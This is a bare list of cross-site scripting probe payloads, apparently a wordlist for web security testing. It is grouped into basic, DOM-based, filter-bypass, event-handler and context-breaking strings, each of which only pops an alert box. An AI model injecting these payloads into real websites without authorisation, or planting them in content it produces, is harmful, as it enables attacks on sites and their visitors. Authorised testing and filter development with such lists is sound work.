# XSS Payloads
# Basic XSS payloads
<script>alert('XSS')</script>
<script>alert("XSS")</script>
<script>confirm('XSS')</script>
<script>prompt('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<iframe src=javascript:alert('XSS')>
<body onload=alert('XSS')>

# DOM-based XSS payloads
javascript:alert('XSS')
data:text/html,<script>alert('XSS')</script>
<img src="x" onerror="alert('XSS')">
<svg/onload=alert('XSS')>

# Filter bypass payloads
<ScRiPt>alert('XSS')</ScRiPt>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror=alert`XSS`>
<svg onload=alert&lpar;'XSS'&rpar;>
<script>eval(atob('YWxlcnQoJ1hTUycpOw=='))</script>

# Event handler payloads
<input onfocus=alert('XSS') autofocus>
<input onblur=alert('XSS') autofocus><input autofocus>
<video><source onerror="alert('XSS')">
<audio src=x onerror=alert('XSS')>
<details open ontoggle=alert('XSS')>

# Context-specific payloads
';alert('XSS');//
';alert(String.fromCharCode(88,83,83));//
</script><script>alert('XSS')</script>
"><script>alert('XSS')</script>
'><script>alert('XSS')</script>
onmouseover=alert('XSS')//
autofocus onfocus=alert('XSS')//